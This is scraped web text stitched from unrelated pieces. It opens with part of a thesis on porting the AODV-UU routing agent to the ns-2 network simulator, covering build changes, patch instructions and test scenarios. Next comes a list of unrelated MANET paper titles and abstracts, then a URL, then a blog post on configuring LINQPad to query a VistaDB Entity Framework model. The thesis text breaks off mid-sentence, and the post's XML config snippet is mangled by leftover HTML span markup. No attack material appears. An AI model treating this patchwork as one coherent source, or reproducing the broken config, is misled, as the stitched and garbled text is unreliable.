timer_queue.h. To solve this, the complete typedef was manually entered for the handler field of the timer struct. Initializations of member variables are not allowed inside the definition of a class. This required the variables that were moved from the different modules into the AODVUU class to be initialized in the constructor of the AODVUU class instead. In general, the original AODV-UU source code did not cause very much trouble during the porting process. This can be seen as an indication of good software development and good adherence to the ISO C standard Platform portability issues During the porting process, the platform portability of the AODV-UU routing agent was investigated. AODV-UU relies on a Linux environment for its network-related datatypes, e.g. those defined by <net/in.h> and <net/if.h>. This causes problems when AODV-UU is to be compiled on other platforms, since the definitions contained in these files differ between platforms. Another large problem is the lack of an endian.h header file on most non-linux platforms. This file determines how multi-byte values are stored in memory, which depends on the architecture of the machine. A prototype solution for this problem, a simple endian.c program generating an endian.h file (which could then be included during compilation), was tried and found to work satisfactorily. The source code of this program is available from [55]. However, it should be noted that this approach does not always work for cross-compilation, where compilation is performed on a machine whose architecture is different from that of the target machine. Attempts were made to compile the AODV-UU routing agent on an UltraSPARC machine running Sun Solaris 8. The endian problem was solved using the endian.c program, but the compilation failed due to problems with the network-related datatypes used by AODV-UU. More research needs to be done in this area for AODV-UU to become portable to other platforms than the Linux platform Miscellaneous source code changes In the previous sections, a number of changes and additions to the existing AODV-UU and ns-2 source code have been described. In addition to those, the following modifications were made: A create-aodvuu-agent instance procedure, similar to the existing create-aodv-agent instance procedure, was added to the Simulator OTcl class in ns/tcl/lib/ns-lib.tcl. This procedure creates and installs an AODV-UU routing agent in a node. The PT_AODVUU packet type was added to the recv() method of the PriQueue class in ns/queue/ priqueue.cc, to allow AODV-UU routing control packets to be prioritized when a Queue/DropTail/ PriQueue priority queue is used. Also, the PT_AODVUU packet type was added to the prq_assign_ queue() method to classify AODV-UU packets as routing protocol packets. AODVUU was added as a possible routing agent choice in the create-wireless-node instance procedure in ns/tcl/lib/ns-lib.tcl. The choice of AODV-UU as the routing agent results in a call to the create-aodvuu-agent instance procedure, described earlier. An init instance procedure of the Agent/AODVUU class in OTcl was added to ns/tcl/lib/ns-agent.tcl. The purpose of this procedure is to supply the routing agent with OTcl commands during initialization. 71 81 The call to random() for HELLO message jittering in the aodv_hello module was replaced with a call to the Random::integer() method of ns-2, using an #ifdef NS_PORT directive. The reason for this is that random() is not portable, and therefore, the built-in random generator of ns-2 must be used instead. The routing table logging in print_rt_table() of the debug module was modified to flush its output after printing each line. Otherwise the line buffer could overflow, resulting in a segmentation fault during large simulations (with a large number of precursors appearing in the routing table) Locating source code changes The changes made to the original AODV-UU and ns-2 source code during the porting are easy to locate, because of the macros used for the selective compilation of the AODV-UU routing agent, and the comments provided where changes have been made. In the ns-2 source code, the changes have been marked with AODV-UU: comments and the usage of the NS_PORT and AODV_UU macros. In the AODV-UU source code, the changes have been marked with NS_PORT: comments and the usage of the NS_PORT macro The AODV-UU Makefile The AODV-UU Makefile handles the compilation of the AODV-UU routing agent (as well as the compilation of the AODV-UU routing daemon). It is called from the Makefile of ns-2 with suitable parameters, allowing the compilation to be performed as if the AODV-UU routing agent had been compiled directly from the ns-2 Makefile. It should be noted that the AODV-UU routing agent can not be compiled manually using only the AODV-UU Makefile; the compilation needs the aforementioned parameters supplied by the ns-2 Makefile. The reason for this split compilation is that ns-2 assumes all source code to be.cc files, not.c files as is the case with most modules of AODV-UU. By letting the AODV-UU Makefile handle compilation of the AODV-UU routing agent, this problem was circumvented. Routing agent packaging The AODV-UU routing agent is packaged as a library, libaodvuu, during compilation. For this, the ar archiver utility is used. The libaodvuu library contains all object files of AODV-UU (one per module), and can be included during linking of ns-2. This approach was chosen to minimize the changes required to the ns-2 Makefile. Configuration options To configure the AODV-UU routing agent to use link layer feedback instead of HELLO messages, the AOD- VUU_LL_FEEDBACK macro should be defined. This is done using the EXTRA_NS_DEFS variable in the AODV-UU Makefile Integrating AODV-UU with ns-2 In the following subsections, the compilation issues associated with the integration of the AODV-UU routing agent into ns-2 are described. Makefile modifications The ns-2 Makefile is generated by the configure utility of the system during installation, using Makefile.in as a template. Therefore, the changes needed for compiling ns-2 with AODV-UU support were added to Makefile.in rather than to a Makefile. These changes are listed below. 72 82 An AODV_UU_DIR variable was defined, specifying where the directory with the AODV-UU source code is located, relative to the ns-2 directory, ns/. The value of this variable was set to aodv-uu, indicating that the AODV-UU source code directory should be ns/aodv-uu. The DEFINE variable was changed to include -DAODV_UU and -DNS_PORT, the macros needed for specifying that AODV-UU support should be added in the ns-2 source code and that AODV-UU should be compiled as an ns-2 routing agent. The LIB variable was changed to include the AODV-UU directory in the library path, and the libaodvuu library. This ensures that the AODV-UU routing agent is incuded during the linking process. A phony aodv-uu target was added, so that the AODV-UU routing agent will be compiled (i.e., the AODV-UU Makefile is called) each time ns-2 is compiled. Three variables are passed from the ns-2 Makefile to the AODV-UU Makefile during compilation; NS_DEFS (the defines used by the ns-2 Makefile), OPTS (the compiler options used by the ns-2 Makefile) and NS_INC (specifying the absolute path to the ns-2 directory). These are used by the AODV-UU Makefile to compile the AODV-UU routing agent as if it had been compiled directly from the ns-2 Makefile. A phony aodv-uu-clean target was added to allow cleaning of compiled files in the AODV-UU directory to be performed from the ns-2 Makefile. This target switches to the AODV-UU directory and issues make clean there, i.e., the actual cleaning is performed by the AODV-UU Makefile. The aodv-uu-clean target was also added as the first dependency of the existing clean target, so that the AODV-UU directory is cleaned whenever make clean is issued in the ns-2 directory. The aodv-uu target was added as the first dependency of the ns target, so that AODV-UU is compiled whenever ns-2 is compiled. Distribution of modifications It was decided that all changes made to the original ns-2 source code during the porting of AODV-UU should be distributed as a patch, which can be applied to a fresh copy of ns-2 using the patch utility of the system. This eliminates the need for manually replacing or modifying files in the ns-2 source code tree when AODV-UU support is to be installed, e.g. by an end user. Compilation instructions Compilation of the AODV-UU routing agent is very straightforward. The required steps are described below. A fresh copy of ns-2, version 2.1b9, is needed. It should be unpacked and installed on the target system, e.g. into a ns/ directory. A directory containing all the AODV-UU files should be created as aodv-uu below the ns-2 directory, i.e., as ns/aodv-uu. Any desired changes to the AODV-UU Makefile should be made (see section ). The ns-2 source code tree should be patched, using the patch supplied with AODV-UU: cd ~ns/ patch -p1 < aodv-uu/ns-2.1b9-aodv-uu-0.5.patch This introduces all necessary changes to the ns-2 source code tree for AODV-UU to be supported. 73 83 Finally, ns-2 should be re-compiled. The following sequence of commands is recommended to ensure that all portions of ns-2 are re-compiled: cd ~ns/./configure./make distclean./configure./make After successful compilation, the AODV-UU routing agent can be used as described in section Bugs found by simulation During initial testing of the AODV-UU routing agent, some bugs in AODV-UU were found and corrected. One of the most serious bugs encountered was a log buffer overflow in the debug module, causing the simulator to crash with a segmentation fault when a large simulation was conducted and routing table logging had been enabled. It turned out that a large number of precursors appearing in the routing table caused the program to write log data outside its log buffer. This bug was solved by flushing the routing table log after each line. Simulations also revealed a bug in the processing of AODV messages, where the reception of a message could cause buffered packets to be scheduled for transmission even though an active route to the destination did not exist. This lead to repeated buffering and un-buffering of packets. Finally, errors related to RERR processing were found and corrected by the author of AODV-UU. It was concluded that the simulations helped finding obscure bugs that probably would not have been found otherwise. 6.9 Future work Some future work remains to be done on the AODV-UU routing agent. The issues listed below have not been (fully) addressed, due to time constraints. Support for local repair should be added as soon as this feature becomes available for the AODV-UU routing daemon. The tagged trace format should be supported. Although this format is new and relatively uncommon, its importance may increase in the future. Support for using the AODV-UU routing agent in wired and wired-cum-wireless scenarios should be investigated. The primary mission so far has only been to use AODV-UU as an ad-hoc routing agent for wireless mobile nodes. The portability of AODV-UU should be extended so that it can be run on other platforms than Linux, e.g. Sun Solaris. This is an important step to increase its usage in the research community. Possibly, the configuration parameters of the AODV-UU routing agent should be checked during runtime, e.g. by introducing a special configuration command and enforcing its usage. This would prevent users from supplying incorrect parameters to the routing agent Summary The porting of AODV-UU to run in the ns-2 network simulator was successfully accomplished. By using the preprocessor and macros for source code extraction, an AODV-UU routing agent was constructed that uses the same source code as the conventional Linux version, with only minor differences in packet handling. This 74 84 approach also allows for easy switching between compilation of the ported version and the conventional version. The separate compilation of software modules in AODV-UU was preserved by letting the AODV-UU Makefile compile these modules, given certain compilation parameters from the ns-2 Makefile. Finally, the AODV-UU routing agent was integrated into ns-2 by packaging it as a library, which is included during linking. During initial testing in the simulator, bugs were found that probably would not have been possible to find in real-world experiments with AODV-UU. This confirms that simulations and real-world experiments complement each other in more than one way. Further testing of the AODV-UU routing agent can be found in Chapter 7. 75 85 Chapter 7 Testing the Functionality of AODV-UU in ns Introduction After porting AODV-UU to run in the ns-2 network simulator, its functionality had to be verified. To do this, several test-runs were performed using different scenarios supplied with ns-2 version 2.1b9 as well as standalone scenarios, and the results were compared to the expected results specified by the documentation for each scenario. Documentation for those scenarios that are part of the ns-2 distribution can be found in [56], and the source code of all scenarios and supplemental scripts mentioned in this chapter is available from [55]. The notion ns followed by a path and a filename refers to the corresponding file in the ns-2 source code tree; the complete source code of ns-2 is available from the ns-2 homepage [8]. 7.2 General setup The scenarios were modified to use the AODV-UU routing agent by changing the routing protocol setting to AODVUU, and the simulation scenario script files were named or re-named to indicate this. AODV-UU version 0.5 was compiled with the option to use HELLO messages. The default run-time configuration options for AODV-UU were used, except for logging which was also enabled. If not otherwise stated, the scenarios use de facto wireless settings, i.e., a WirelessChannel wireless channel, a WirelessPhy wireless network interface with 2 Mbps bandwidth, the two-ray ground reflection radio propagation model, the 802_11 MAC layer (using 2 Mbps as the data rate both for unicast and broadcast packets), a PriQueue priority queue of length 50 as an interface queue, and an omni-directional antenna. All these components come with certain default settings, which can be found in ns/tcl/lib/ns-default.tcl. 7.3 simple-wireless-aodv-uu.tcl Scenario overview In simple-wireless-aodv-uu.tcl, communication between two mobile nodes is tested by moving them relative to each other so that one node is not always within radio range of the other one. This scenario is based on ns/tcl/ ex/simple-wireless.tcl Scenario setup The scenario sets up a 500 x 500 m flat grid and places two mobile nodes out of each other s radio range. One node has a TCP sink agent attached to it, which will receive (and throw away) any incoming TCP traffic. The 76 86 other node has an FTP agent connected to its TCP agent, simulating FTP traffic. The nodes are connected to each other through the wireless channel Scenario description and results The FTP traffic is started at time 10 seconds. However, at this time the nodes are too far apart for any communication to take place. At time 50 seconds, the node with the TCP sink starts moving towards the FTP source node, and at time 68 seconds, the nodes are close enough to begin exchanging routing control messages. It has been verified that the routing tables of the two nodes are set up correctly, by using the routing table logging option of AODV-UU and analyzing the routing table logfiles. At time 100 seconds, the TCP traffic starts to flow, and the TCP sink starts moving away from the FTP source node. This causes the link between them to break at time 116 seconds, and subsequent packets are dropped. The link failure is reflected in the nodes routing tables at time 119 seconds, and the simulation ends at time 150 seconds Conclusions Analysis of the trace log from the simulator as well as the AODV-UU logfiles shows that the scenario works as expected using AODV-UU. The events in the trace log correspond to those of the scenario documentation. 7.4 wireless1-aodv-uu.tcl Scenario overview In wireless1-aodv-uu.tcl, three nodes are placed in such a way that two of the nodes need to route their traffic through an intermediate node to reach each other. This scenario is based on ns/ns-tutorial/wireless1.tcl Scenario setup The movement and traffic patterns are loaded from separate files, scen-3-test and cbr-3-test, which are part of the ns-2 distribution. The movement pattern file covers random-waypoint movements over an area of 670 x 670 m, and the traffic pattern file sets up connections between the three nodes during the duration of the simulation (400 seconds). The layout of the scenario is visualized by NAM (Network Animator) in Figure Results and conclusions By analyzing the AODV-UU routing table logfiles, it was concluded that the two outermost nodes always use the intermediate node to send traffic to each other, and that the intermediate node is the only node ever within radio range of both the other nodes simultaneously. 7.5 The Roaming Node scenario In order to validate the functionality of AODV-UU in ns-2 further, a scenario called "Roaming Node" was adopted. This scenario was originally used for real-world experiments concerning the "Gray Zone Problem" [58], when using HELLO messages as periodic node announcements with AODV-UU together with wireless communication based on IEEE b. Briefly, the Gray Zone Problem refers to the fact that HELLO messages, being sent as broadcast packets, may reach a node although it is impossible for data packets to get through (the latter being sent as unicast packets at a higher bit rate). This causes nodes in such gray zones to falsely believe that they have proper connectivity to some of their neighboring nodes, resulting in packet loss when attempts are made to send data packets. The reasons for choosing this specific scenario to test the functionality of AODV-UU in ns-2 were the following: 77 87 Figure 7.1: Layout of the wireless1-aodv-uu.tcl scenario. All network traffic in this scenario has to pass through an intermediate node. The real-world results of the scenario have been carefully documented in [58]. This includes diagrams and detailed descriptions of real-world results using AODV-UU. The scenario is small enough to easily be understood, yet complicated enough to test multi-hop routing and observing the behavior of the routing agent when link failures occur. It is a good starting point for evaluating if simulation results correspond well to real-world results, and getting to know which problems that may arise when transferring a real-world scenario into one in the simulator Scenario overview The Roaming Node scenario consists of four nodes (denoted GW, C1, C2 and MN), of which three are stationary (GW, C1 and C2) and the fourth one (MN) is a mobile node, "roaming" the environment while sending Ping packets to GW. The GW node sends a Ping reply back to the mobile node for each Ping packet it receives. The nodes are placed in such a way that each stationary node is within radio range of only its nearest neighbor(s). This will force both the mobile node and the GW node to send their Ping packets through another stationary node in order to reach each other during some parts of the scenario. The layout of the Roaming Node scenario is shown in Figure Scenario setup Measurements were taken from the real-world environment where the Roaming Node scenario originally took place, and were transferred into coordinates in the simulation scenario script file, roaming-aodv-uu.tcl. Since the flat grid topography in ns-2 uses metres as its unit of measurement, this was easily done. To model the wireless communication of the Roaming Node scenario more correctly in the simulator, some changes had to be made to the default values of the wireless physical layer. Radio characteristics of the wireless network cards used in the real-world experiments (ORiNOCO b PC Cards) were taken from [59], and the affected values were set in the simulation scenario script file. Most importantly, the receive threshold for all nodes in the scenario was set to a value corresponding to a radio range of 22.5 m. This is roughly enough for the Keywords- manet, routing protocols, aodv, olsr, grp,data drop parameter. Volume 5, Issue 3, March 2015 ISSN: 2277 128X International Journal of Advanced Research in Computer Science and Software Engineering Research Paper Available online at: Evaluation of Distance Vector Routing Protocols. Routing Protocols and Concepts Ola Lundh Distance Vector Routing Protocols Routing Protocols and Concepts Ola Lundh Objectives The characteristics of distance vector routing protocols. The network discovery process of distance vector routing LIST OF FIGURES. Figure No. Caption Page No. LIST OF FIGURES Figure No. Caption Page No. Figure 1.1 A Cellular Network.. 2 Figure 1.2 A Mobile Ad hoc Network... 2 Figure 1.3 Classifications of Threats. 10 Figure 1.4 Classification of Different QoS CHAPTER 6. VOICE COMMUNICATION OVER HYBRID MANETs CHAPTER 6 VOICE COMMUNICATION OVER HYBRID MANETs Multimedia real-time session services such as voice and videoconferencing with Quality of Service support is challenging task on Mobile Ad hoc Network (MANETs). International Journal of Advanced Research in Computer Science and Software Engineering Volume 2, Issue 9, September 2012 ISSN: 2277 128X International Journal of Advanced Research in Computer Science and Software Engineering Research Paper Available online at: Power Aware Keywords: DSDV and AODV Protocol Volume 3, Issue 12, December 2013 ISSN: 2277 128X International Journal of Advanced Research in Computer Science and Software Engineering Research Paper Available online at: Comparison CHAPTER 1 INTRODUCTION 21 CHAPTER 1 INTRODUCTION 1.1 PREAMBLE Wireless ad-hoc network is an autonomous system of wireless nodes connected by wireless links. Wireless ad-hoc network provides a communication over the shared wireless} Achieving Energy Efficiency in MANETs by Using Load Balancing Approach International Journal of Computer Networks and Communications Security VOL. 3, NO. 3, MARCH 2015, 88 94 Available online at: E-ISSN 2308-9830 (Online) / ISSN 2410-0595 (Print) Achieving Delay aware Reactive Routing Protocols for QoS in MANETs: a Review Delay aware Reactive Routing Protocols for QoS in MANETs: a Review Saad M. Adam*, Rosilah Hassan Network and Communication Technology Research Group, Faculty of Information Science and Technology, Universiti VOICE COMMUNICATION OVER MOBILE AD-HOC NETWORKS VOICE COMMUNICATION OVER MOBILE AD-HOC NETWORKS A thesis submitted in partial fulfillment of the requirements for the degree of Bachelor of Science in Engineering Department of Computer Science and Engineering Location Information Services in Mobile Ad Hoc Networks Location Information Services in Mobile Ad Hoc Networks Tracy Camp, Jeff Boleng, Lucas Wilcox Department of Math. and Computer Sciences Colorado School of Mines Golden, Colorado 841 Abstract In recent) UNIT 8:- Mobile Ad-Hoc Networks, Wireless Sensor Networks UNIT 8:- Mobile Ad-Hoc Networks, Wireless Sensor Networks a Mobile Ad hoc NETwork (MANET) is one that comes together as needed, not necessarily with any support from the existing infrastructure or any co Characterizing and Tracing Packet Floods Using Cisco R co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1 Implementation of Virtual Local Area Network using network simulator 1060 Implementation of Virtual Local Area Network using network simulator Sarah Yahia Ali Department of Computer Engineering Techniques, Dijlah University College, Iraq ABSTRACT Large corporate environments,, A Survey: High Speed TCP Variants in Wireless Networks ISSN: 2321-7782 (Online) Volume 1, Issue 7, December 2013 International Journal of Advance Research in Computer Science and Management Studies Research Paper Available online at: A Survey: `PERFORMANCE COMPARISON OF ENERGY EFFICIENT AODV PROTOCOLS `PERFORMANCE COMPARISON OF ENERGY EFFICIENT AODV PROTOCOLS Divya Sharma CSE Dept, ITM Guargoan divya@itmindia.edu Ashwani Kush Computer Dept, University College Kurukshetra University India akush@kuk.ac MASTER THESIS REPORT MSc IN ELECTRICAL ENGINEERING WITH EMPHASIS ON TELECOMMUNICATION MEE 09: 17 MASTER THESIS REPORT MSc IN ELECTRICAL ENGINEERING WITH EMPHASIS ON TELECOMMUNICATION TRASMISSION CONTROL PROTOCOL (TCP) PERFORMANCE EVALUATION IN MANET BLEKINGE INSTITUTE OF TECHNOLOGY MARCH OPNET - Network Simulator Simulations and Tools for Telecommunications 521365S: OPNET - Network Simulator Jarmo Prokkola Project Manager, M. Sc. (Tech.) VTT Technical Research Centre of Finland Kaitoväylä 1, Oulu P.O. Box 1100,,: Scalable Routing Protocols for Mobile Ad Hoc Networks Scalable Routing Protocols for Mobile Ad Hoc Networks Xiaoyan Hong, Kaixin Xu, Mario Gerla Computer Science Department, University of California, Los Angeles, CA 90095 {hxy,xkx,gerla}@cs.ucla.edu Abstract 3. MONITORING AND TESTING THE ETHERNET NETWORK 3. MONITORING AND TESTING THE ETHERNET NETWORK 3.1 Introduction The following parameters are covered by the Ethernet performance metrics: Latency (delay) the amount of time required for a frame to travel SECURITY ASPECTS IN MOBILE AD HOC NETWORK (MANETS) SECURITY ASPECTS IN MOBILE AD HOC NETWORK (MANETS) Neha Maurya, ASM S IBMR ABSTRACT: Mobile Ad hoc networks (MANETs) are a new paradigm of wireless network, offering unrestricted mobility without any underlying Introduction to Metropolitan Area Networks and Wide Area Networks Introduction to Metropolitan Area Networks and Wide Area Networks Chapter 9 Learning Objectives After reading this chapter, you should be able to: Distinguish local area networks, metropolitan area networks, OPNET Network Simulator Simulations and Tools for Telecommunications 521365S: OPNET Network Simulator Jarmo Prokkola Research team leader, M. Sc. (Tech.) VTT Technical Research Centre of Finland Kaitoväylä 1, Oulu P.O. Box 1100, 10CS64: COMPUTER NETWORKS - II QUESTION BANK 10CS64: COMPUTER NETWORKS - II Part A Unit 1 & 2: Packet-Switching Networks 1 and Packet-Switching Networks 2 1. Mention different types of network services? Explain the same. 2. Difference
http://docplayer.net/42034480-Porting-aodv-uu-implementation-to-ns-2-and-enabling-trace-based-simulation.html
CC-MAIN-2018-43
refinedweb
37,449
51.58
Chapter 3. Known issues This section lists known issues with Red Hat CodeReady Workspaces 2.6. Where available, workaround suggestions are provided. 3.1. CodeReady Workspaces cannot be installed with default settings in the proxied environment using OperatorHub on OpenShift Container Platform 4.6 During a installation on OpenShift Container Platform 4.6 using OperatorHub the CodeReady Workspaces Pod fails to deploy with following error message: Error in custom provider, java.lang.RuntimeException: Exception while retrieving OpenId configuration from endpoint: To work around this issue, add the .svc value to nonProxyHosts property of CheCluster Custom Resource. See Preparing CodeReady Workspaces Custom Resource for installing behind a proxy. 3.2. Temporary factory authentication flow for Bitbucket with required manual configuration CodeReady Workspaces provides the ability to use factories with Bitbucket repositories. The current factory authentication flow requires manual configuration for the user’s project credentials that the user or administrator must do. For more information, see Configuring Bitbucket servers and Deploying CodeReady Workspaces with support for Git repositories with self-signed certificates. 3.3. Upgrade to CodeReady Workspaces version 2.6 using crwctl fails on OpenShift Container Platform 3.11 The crwctl server:update command fails if executed from a folder where another templates directory exists. Ensure there is no templates subdirectory, with a not-relate content to crwctl, in the directory from which the crwctl server:update command is executed. 3.4. Signing in to GitHub from a CodeReady Workspaces workspace using the GitHub plug-in fails When this issue occurs, connect a GitHub account using the CodeReady Workspaces user dashboard to sign into the GitHub repository. Make sure that GitHub OAuth is set. Then follow one of the described possibilities about how to add a GitHub account to CodeReady Workspaces. From the Workspace tab of the main dashboard screen: - Navigate to the Project sub-tab. - Click thebutton. - From the GitHub tab, use the button. From the left bottom menu of the main dashboard screen: - Click Account and continue with the button, which will forward you to the Red Hat Single Sign-On main screen. - From the left menu, select the Federated identity tab. - Add the GitHub account using thebutton. - CRW-1563 3.5. A workspace IDE is not loading when the workspace PVC is used to its maximum limit An inability to load the keycloak.js JavaScript file when the Persistent Volume Claims (PVCs) of a workspace operate on their maximum limit. As a consequence, the IDE cannot start properly with the workspace. This issue occurs in CodeReady Workspaces workspaces with a disabled OpenShift OAuth service combined with the Common PVC strategy. 3.6. Some workspace plug-ins do not load behind a proxy To work around this issue: 3.7. Workspaces on OpenShift Container Platform 4.6 fail to start when cluster-wide proxy settings are applied Workspaces with useInternalClusterSVCNames environment variable set to true fail on OpenShift Container Platform 4.6 clusters with wide proxy settings applied. To work around this issue: 3.8. Logging in to a CodeReady Workspaces workspace using the crwctl tool fails with OpenShift OAuth support enabled. The crwctl auth:login utility fails to log in to CodeReady Workspaces with OAuth support. To work around this issue: 3.9. Breakpoints of the debug session do not work correctly in a Quarkus workspace A breakpoint is currently triggered only if it is set during the current debug session. 3.10. Debug configuration is not displayed in the Debug view A problem related to file watchers infrequently occurs, causing a disability to start a debug session because of the missing debug configuration in the Debug view. To work around this issue, open the /projects/.theia/launch.json file and use the configuration file, which will now be present in the Debug view. 3.11. Missing preinstalled language server tools for GO workspaces The absence of additional tools causes a feature, such as Auto-complete, to fail in a workspace created using the default GO devfile. To work around this issue in a non-restricted environment installation, install the required module using thebutton of the pop-up window in the IDE. 3.12. Rare workspace startup failures Infrequently, CodeReady Workspaces workspaces fail at the start when multiple workspaces are started in a cluster simultaneously. The issue affects less than 1% of all workspaces started. 3.13. The Topology view does not respect CodeReady Workspaces icon on OpenShift Container Platform 4.6 After creating an application in the Developer console of OpenShift Container Platform 4.6, the Edit source icon in the Topology view displays as Eclipse Che logo. 3.14. The Install dependencies command fails in the PHP-DI workspace on OpenShift Container Platform 4.6 The Install dependencies (with composer) command, predefined the php-di/console.php file, fails in a workspace created using the PHP-DI default yaml. 3.15. Inability to request a JSON response from OpenShift client Attempts to obtain a JSON response request from OpenShift client fails and are accompanied by a warning message in the Red Hat Single Sign-On Pod. WARN [org.jgroups.protocols.kubernetes.KUBE_PING] (thread-138,ejb,ycloak-598b6c57b4-khhfb) failed getting JSON response from Kubernetes Client[masterUrl= , headers={Authorization=#MASKED:883#}, connectTimeout=5000, readTimeout=30000, operationAttempts=3, operationSleep=1000, streamProvider=org.jgroups.protocols.kubernetes.stream.TokenStreamProvider@792525a5] for cluster [ejb], namespace [default], labels [null]; encountered [java.lang.Exception: 3 attempt(s) with a 1000ms sleep to execute [OpenStream] failed. Last failure was [java.io.IOException: Server returned HTTP response code: 403 for URL: ]] 3.16. Inability to edit a Red Hat Single Sign-On user account After logging in to Red Hat Single Sign-On, a user is not able to edit an account profile using the Manage account tab. 3.17. Inability to install CodeReady Workspaces on OpenShift Container Platform 3.11 without cluster-admin role The customer in an organization with a strict security policy cannot install CodeReady Workspaces v2.1.1 on OCP 3.11 cluster with the crwctl utility, which requires a user with cluster-admin privileges. 3.18. Proxy settings blocks access to dependencies of building tools in restricted environments For instances of CodeReady Workspaces deployed in restricted environments, their proxy blocks to reach downloadable dependencies for building tools such as Maven, Gradle, and others. To work around this issue, configure the proxy settings to allow the specific builder to reach needed dependencies. 3.19. Partially-deployed CRW Operator crashes if the CheCluster custom resource is deleted A partially-deployed codeready-operator, installed from the OperatorHub, crashes after deleting a CheCluster CR. (runtime error: invalid memory address or nil pointer dereference) 3.20. Wrong default value for a Quarkus project default folder Instead of suggesting /projects/ as the default target folder of the Quarkus sample project, the Create Quarkus project button of the Quarkus wizard suggests the root folder (/) instead, which is not visible from the IDE. To work around this issue, reject the suggested destination and use /projects. 3.21. CodeReady Workspaces 2.5 Red Hat Fuse workspaces fail to start after migration to 2.6 CodeReady Workspaces 2.5 Red Hat Fuse workspaces deployed on OpenShift with enabled OpenShift OAuth support fail to start after updating to 2.6. 3.22. Manually added registries using Theia Plugin View are not reflected in the View automatically To work around this issue, refresh the page by pressing F5 or Comd+r if using macOS. 3.23. Some run and build commands of the The Getting started examples may fail in the AirGap installations Some of the sample projects included in the Getting started section are not designed for offline or airgapped use, so some commands may not work. To resolve this, user may have to talk to a organization’s administrator to get access to internal mirrors, such as NMP, Maven, and PIP. The base functions of the Getting started ZIP-archived samples embedded in the offline devfile registry do not work. Commands that require internet access to run: Run, Simple build, Outline 3.24. Deleting a CheCluster custom resource causes CodeReady Workspaces Operator errors Uninstalling the CodeReady Workspaces manually by deleting the checluster custom resource in the OperatorHub causes errors in the CodeReady Workspaces Operator. As a consequence, attempting to re-install CodeReady Workspaces in OperatorHub fails. 3.25. CodeReady Workspaces deployed without TLS support causes some features to not work properly In CodeReady Workspaces 2.1 and later, secure HTTPS is required to use the most recent Theia IDE, and therefore TLS mode is enabled by default. Disabling the TLS support will cause user experience to suffer and some UI will not work as expected or at all. For example, the welcome page may be blank or broken, images may be missing, and other functionality may not work properly.
https://access.redhat.com/documentation/en-us/red_hat_codeready_workspaces/2.6/html/release_notes_and_known_issues/known-issues
CC-MAIN-2021-21
refinedweb
1,460
54.52
. Have you tried to use LINQ to query a database using Visual Studio? It can be a frustrating experience of things that compile fail at runtime, and that edit / compile / test cycle can quickly lead to hours of lost time trying to get a single complex query to work correctly. LINQPad is sort of like a Notepad, you can write and edit .linq files using it. But that is where the Notepad similarity stops. You can execute your LINQ queries and see the results without having to run your application. It is truly something you have to watch in order to believe how much more productive it can make your writing of LINQ. When I was first working on the VistaDB product store and account manager writing LINQ queries against my Entity Framework objects was incredibly frustrating. Most of the documentation and samples I found was for Linq2Sql, which is similar syntax… But not the same. And worse, most of the syntax compiles fine, but blows up at runtime with cryptic error messages. My typical dev and test cycle was around 5 minutes to compile the DAL / Site, login to the account, navigate to the correct page, and visit the yellow screen of death from asp.net. It was not fun, so I started working in a stand alone tester app I built just for this purpose. Write the query, compile, debug, step, step, read exception and try to decipher it. I was reading a post on Stack Overflow about one of those cryptic errors when someone suggested to the poster they use LINQPad to test their queries first before putting them into their apps. Wow, what a great idea! Where was this tool? (You can download it for free from Linqpad.net ) LINQPad allows you to execute single LINQ commands against an existing EF model, or even to write dot net code in the editor and execute it like a little dynamic dot net environment. The main application is free, but there is an auto-complete feature to the editor that you must pay in order to activate. Believe me it is worth it to pay for the license, you also support the author and show him the application is worth money. The license is very inexpensive and well worth the price in order to get intellisense like behavior on your LINQ queries. The first couple versions I played with worked great with SQL Server, but could not load the VistaDB EF provider. I was bummed, but at least I could debug my queries against SQL Server, and then run against VistaDB to make sure it worked the same way. But I recently got an email from the author of LINQPad that it could load VistaDB, in version 2. So now I can use it with VistaDB 4 and test my LINQ queries the same way I do the SQL Server queries. The steps are a little difficult the first time you do them, but nothing that should scare off something taking up LINQ (it is pretty scary all by itself). Ok, first things first. You have to get LINQPad to be able to load your VistaDB developer license. Since it obviously wasn’t compiled with VistaDB in mind, you need to use the app.config approach. In this case you create a LINQPad.config file in the same directory as the executable. NOTE: This is NOT the linqpad.exe.config that comes with the beta download. It must be named LINQPad.config in the same directory as the EXE. ">configuration</span><span class="kwrd">></span> <span class="kwrd"><</span><span class="html">appSettings</span><span class="kwrd">></span> <span class="kwrd"><</span><span class="html">add</span> <span class="attr">key</span><span class="kwrd">="VistaDBUseDesignTimeLicense"</span> <span class="attr">value</span><span class="kwrd">="true"</span><span class="kwrd">/></span> <span class="kwrd"></</span><span class="html">appSettings</span><span class="kwrd">></span> <span class="kwrd"></</span><span class="html">configuration</span><span class="kwrd">></span> This will tell the engine to allow LINQPad to use your design time license. All that means is you must have a valid developer license on the machine where you are running LINQPad. You can build your EF model in an EXE or DLL assembly, but the model namespace must be public. It is going to be reflection loaded by LINQPad, so it has to be able to reach it. I built the project as a .Net 3.5 Console Application and then added an Entity Framework model to our VistaDB Site database. I don’t normally recommend a complete database as a single Model, but this was just for a demonstration. Now build the application so you have an output of the DLL or EXE. You will need this to point LINQPad to in order to load your model. Within LINQPad there is an area on the left that represents all your current connections to databases. This is sort of like the Server Explorer in Visual Studio. The top entry is an Add Connection link, click that to see the Choose Data Context dialog. Choose the Entity Framework from a typed data context in your own assembly. This will be the application we just built above. Select Next and a LINQPad connection dialog appears. Choose the BROWSE link on the Path to Custom Assembly textbox. Browse to your assembly and choose the dll or exe, a Choose Custom Type dialog will appear asking you to identify which models you want to use from that assembly. After choosing the assembly the connection dialog will look something like this image below. It is not correct yet, but if you take a moment and copy the Server field it includes the actual filename you need in the next step. Under the PROVIDER group box choose the OTHER checkbox and the dialog will change. Choose the System.Data.VistaDB provider name from the dropdown, and then enter a valid connection string. I recommend you just use the Data Source= and the name of the file from the previous step. You can’t use macros like DataDirectory because the working path of LINQPad is not your application. You need to provide an absolute path. If you don’t remember the VistaDB connectionstring options visit the website. The Remember this connection means that LINQPad will reload that connection at next startup. The TEST button should load and return a success to your database. If it fails with file not found then you probably have the wrong path to the database, or an error in your connection string. Now the complete model is visible in the connection area of LINQPad, and you are ready to start writing LINQ queries against VistaDB. The complete model is shown, and you can navigate down through the entities to look at their properties. Now you can write a query against the EF model and get answers by running them directly within LINQPad. In this case I am selecting all the shipping products and ordering them by the productid. See the RESULTS selected under that query? You can select the Lambda symbol and see what the query looks like as a Lambda. Notice the Lambda syntax looks quite a bit different. I personally really like this ability to have 